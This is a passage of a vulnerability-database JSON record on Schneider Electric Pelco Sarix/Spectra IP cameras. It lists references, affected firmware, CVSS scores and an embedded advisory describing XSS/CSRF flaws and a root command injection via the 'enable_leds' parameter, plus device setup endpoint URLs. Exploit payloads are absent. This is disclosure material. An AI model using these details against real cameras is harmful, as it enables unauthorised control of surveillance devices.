"url": "https://cxsecurity.com/issue/wlb-2017070076"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/143314"
},
{
"trust": 0.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/129666"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7828"
},
{
"trust": 0.1,
"url": "https://cxsecurity.com/issue/wlb-2017070075"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/143313"
},
{
"trust": 0.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/129665"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7827"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/network/dot1x/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/system/general/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/events/handlers/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/network/general/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/network/snmp/update\""
},
{
"trust": 0.1,
"url": "https://www.pelco.com"
},
{
"trust": 0.1,
"url": "http://www.zeroscience.mk/en/vulnerabilities/zsl-2017-5415.php"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5416"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2018-05330"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002614"
},
{
"db": "PACKETSTORM",
"id": "143313"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-053"
},
{
"db": "NVD",
"id": "CVE-2018-7236"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5416"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2018-05330"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002614"
},
{
"db": "PACKETSTORM",
"id": "143313"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-053"
},
{
"db": "NVD",
"id": "CVE-2018-7236"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-07-10T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"date": "2017-07-10T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5416"
},
{
"date": "2017-07-10T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"date": "2017-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"date": "2018-03-15T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-05330"
},
{
"date": "2018-04-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-002614"
},
{
"date": "2017-07-11T04:32:15",
"db": "PACKETSTORM",
"id": "143313"
},
{
"date": "2018-03-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201803-053"
},
{
"date": "2018-03-09T23:29:00.810000",
"db": "NVD",
"id": "CVE-2018-7236"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-02-23T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"date": "2019-02-23T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5416"
},
{
"date": "2019-02-23T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"date": "2017-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"date": "2018-03-15T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-05330"
},
{
"date": "2018-04-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-002614"
},
{
"date": "2022-02-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201803-053"
},
{
"date": "2024-11-21T04:11:50.863000",
"db": "NVD",
"id": "CVE-2018-7236"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201803-053"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Schneider Electric Pelco Sarix Professional Authentication vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-002614"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201803-053"
}
],
"trust": 0.6
}
}
VAR-201905-1022
Vulnerability from variot - Updated: 2024-11-23 21:39A Permissions, Privileges, and Access Control vulnerability exists in the web-based GUI of the 1st Gen Pelco Sarix Enhanced Camera that could allow a remote attacker to delete an arbitrary file. Pelco Sarix Enhanced Camera Contains vulnerabilities related to authorization, permissions, and access control.Information may be tampered with. PelcoSarix/SpectraCameras is a camera from Pelco. SchneiderElectricPelcoSarix/SpectraCameras has multiple cross-site scripting vulnerabilities that an attacker can exploit to execute arbitrary HTML and script code. SchneiderElectric1stGenPelcoSarixEnhancedCamera is a series of fixed IP cameras from Schneider Electric, France. The vulnerability stems from the lack of effective permissions and access control measures for network systems or products. An attacker could exploit the vulnerability to cause a system denial of service. Pelco offers the broadest selection of IP cameras designedfor security surveillance in a wide variety of commercial and industrialsettings. The POST parameter 'enable_leds' locatedin the update() function called via the GeneralSetupController.phpscript is not properly sanitised before being used in writeLedConfig()function to enable led state to on or off. A remote attacker canexploit this issue and execute arbitrary system commands grantingher system access with root privileges using a specially craftedrequest and escape sequence to system shell.Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknownMontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)Lighttpd/1.4.28PHP/5.3.0. Schneider Electric Pelco Sarix/Spectra Cameras Multiple XSS Vulnerabilities
Vendor: Schneider Electric SE Product web page: https://www.pelco.com Affected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0) Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0) Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722) Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503) Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0)
Summary: Pelco offers the broadest selection of IP cameras designed for security surveillance in a wide variety of commercial and industrial settings. From our industry-leading fixed and high-speed IP cameras to panoramic, thermal imaging, explosionproof and more, we offer a camera for any environment, any lighting condition and any application. When nothing but the best will do. SarixaC/ Enhanced Range cameras provide the most robust feature-set for your mission-critical applications. With SureVisionaC/ 3.0, Sarix Enhanced delivers the best possible image in difficult lighting conditions such as a combination of bright areas, shaded areas, and intense light. Designed with superior reliability, fault tolerance, and processing speed, these rugged fixed IP cameras ensure you always get the video that you need.
Desc: Pelco cameras suffer from multiple dom-based, stored and reflected XSS vulnerabilities when input passed via several parameters to several scripts is not properly sanitized before being returned to the user.
Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980) Lighttpd/1.4.28 PHP/5.3.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience
Advisory ID: ZSL-2017-5415 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5415.php
07.04.2017
--
CSRF/XSS on username parameter:
history.pushState('', '', '/')CSRF/XSS on gateway, hostname, ip_address, nameservers, http_port, rtsp_port and subnet_mask parameter:
history.pushState('', '', '/')CSRF/XSS on version parameter:
history.pushState('', '', '/')CSRF/XSS on device_name, ntp_server, region, smtp_server and zone parameter:
history.pushState('', '', '/')XSS on ftp_base_path, ftp_server, ftp_username, ftp_password and name parameter:
history.pushState('', '', '/') Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201905-1022",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "imes19-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ixe11",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6220l",
"scope": "gte",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.11"
},
{
"model": "ime3122-b1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ixes1",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ixe21",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-b1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-b1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-b1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6220",
"scope": "gte",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.11"
},
{
"model": "ime3122-b1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6230",
"scope": "gte",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.11"
},
{
"model": "ime119-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6230l",
"scope": "gte",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.11"
},
{
"model": "ime3122-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ixe31",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-b1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6220",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "d6220l",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "d6230",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "d6230l",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "ime119-1i",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "ime119-1p",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "ime119-1s",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "imes19-1i",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "imes19-1p",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "imes19-1s",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "sarix/spectra cameras",
"scope": null,
"trust": 0.6,
"vendor": "pelco",
"version": null
},
{
"model": "electric spectra enhanced model: d6230 2.2.0.5.9340-a0.0",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix model: id10dn 1.8.2.18-20121109-1.9110-o3.8503",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix model: d5230 1.9.2.23-20141118-1.9330-a1.10722",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix enhanced model: ime119 2.1.2.0.8280-a0.0",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix enhanced model: ime219 2.1.2.0.8280-a0.0",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric 1st gen pelco sarix enhanced camera",
"scope": null,
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime219 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime119 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: d5230 (firmware: 1.9.2.23-20141118-1.9330-a1.10722)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: id10dn (firmware: 1.8.2.18-20121109-1.9110-o3.8503)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "spectra enhanced - model: d6230 (firmware: 2.2.0.5.9340-a0.0)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime219 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime119 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: d5230 (firmware: 1.9.2.23-20141118-1.9330-a1.10722)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: id10dn (firmware: 1.8.2.18-20121109-1.9110-o3.8503)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "spectra enhanced - model: d6230 (firmware: 2.2.0.5.9340-a0.0)"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-15702"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015516"
},
{
"db": "NVD",
"id": "CVE-2018-7816"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:schneider_electric:d6220_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:d6220l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:d6230_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:d6230l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:ime119-1i_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:ime119-1p_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:ime119-1s_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:imes19-1i_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:imes19-1p_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:imes19-1s_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015516"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Vulnerability discovered by Gjoko Krstic",
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
}
],
"trust": 0.2
},
"cve": "CVE-2018-7816",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.0,
"id": "CVE-2018-7816",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2017-23302",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.0,
"id": "CNVD-2019-15702",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.8,
"id": "CVE-2018-7816",
"impactScore": 3.6,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-7816",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2018-7816",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2017-23302",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2019-15702",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201905-904",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "ZSL",
"id": "ZSL-2017-5417",
"trust": 0.1,
"value": "(4/5)"
},
{
"author": "ZSL",
"id": "ZSL-2017-5415",
"trust": 0.1,
"value": "(3/5)"
}
]
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-15702"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015516"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-904"
},
{
"db": "NVD",
"id": "CVE-2018-7816"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A Permissions, Privileges, and Access Control vulnerability exists in the web-based GUI of the 1st Gen Pelco Sarix Enhanced Camera that could allow a remote attacker to delete an arbitrary file. Pelco Sarix Enhanced Camera Contains vulnerabilities related to authorization, permissions, and access control.Information may be tampered with. PelcoSarix/SpectraCameras is a camera from Pelco. SchneiderElectricPelcoSarix/SpectraCameras has multiple cross-site scripting vulnerabilities that an attacker can exploit to execute arbitrary HTML and script code. SchneiderElectric1stGenPelcoSarixEnhancedCamera is a series of fixed IP cameras from Schneider Electric, France. The vulnerability stems from the lack of effective permissions and access control measures for network systems or products. An attacker could exploit the vulnerability to cause a system denial of service. Pelco offers the broadest selection of IP cameras designedfor security surveillance in a wide variety of commercial and industrialsettings. The POST parameter \u0027enable_leds\u0027 locatedin the update() function called via the GeneralSetupController.phpscript is not properly sanitised before being used in writeLedConfig()function to enable led state to on or off. A remote attacker canexploit this issue and execute arbitrary system commands grantingher system access with root privileges using a specially craftedrequest and escape sequence to system shell.Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknownMontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)Lighttpd/1.4.28PHP/5.3.0. \nSchneider Electric Pelco Sarix/Spectra Cameras Multiple XSS Vulnerabilities\n\n\nVendor: Schneider Electric SE\nProduct web page: https://www.pelco.com\nAffected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0)\n Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0)\n Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722)\n Sarix - Model: ID10DN (Firmware: 